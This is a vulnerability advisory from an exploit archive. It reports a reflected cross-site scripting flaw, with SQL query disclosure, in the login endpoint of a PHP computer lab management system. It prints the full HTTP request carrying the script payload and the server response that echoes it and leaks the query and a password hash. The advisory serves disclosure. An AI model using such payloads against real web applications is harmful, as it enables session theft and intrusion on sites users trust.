Share
## https://sploitus.com/exploit?id=PACKETSTORM:182007
## Titles: LMS2024-1.0 XSS-Reflected Information Disclosure  
## Author: nu11secur1ty  
## Date: 00/04/2024  
## Vendor: https://github.com/oretnom23  
## Software:  
https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#google_vignette  
## Reference: https://portswigger.net/web-security/cross-site-scripting  
  
## Description:  
The value of the username request parameter is copied into the HTML  
document as plain text between tags. The payload ro2iz<img src=a  
onerror=alert(1)>xggkt was submitted in the username parameter. This input  
was echoed unmodified in the application's response.  
  
STATUS: HIGH- Vulnerability  
  
  
[+]Exploits:  
- XSS-Reflected:  
```xss  
POST /php-lms/classes/Login.php?f=login HTTP/1.1  
Host: pwnedhost.com  
Accept-Encoding: gzip, deflate, br  
Accept: */*  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/128.0.6613.138 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
Cookie: PHPSESSID=g61goafu1miq2e737ra7dclqml  
Origin: https://pwnedhost.com  
X-Requested-With: XMLHttpRequest  
Referer: https://pwnedhost.com/php-lms/admin/login.php  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128",  
"Chromium";v="128"  
Sec-CH-UA-Platform: Windows  
Sec-CH-UA-Mobile: ?0  
Content-Length: 37  
  
username=VLVAuyqjro2iz%3cimg%20src%3da%20onerror%3dalert(1)%3exggkt&password=e3I!x1c!Q7  
  
```  
+ [Response]  
```  
HTTP/1.1 200 OK  
Date: Fri, 04 Oct 2024 08:27:39 GMT  
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4  
X-Powered-By: PHP/8.2.4  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Access-Control-Allow-Origin: *  
Content-Length: 177  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
{"status":"incorrect","last_qry":"SELECT * from users where username =  
'VLVAuyqjro2iz<img src=a onerror=alert(1)>xggkt' and password =  
md5('45ec487cfe5b3bac8e61740ae8dbcd06') "}  
  
```  
  
## Reproduce:  
[href](https://www.patreon.com/nu11secur1ty)  
  
  
## Demo PoC:  
[href](https://www.patreon.com/nu11secur1ty)  
  
## Time spent:  
00:27:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>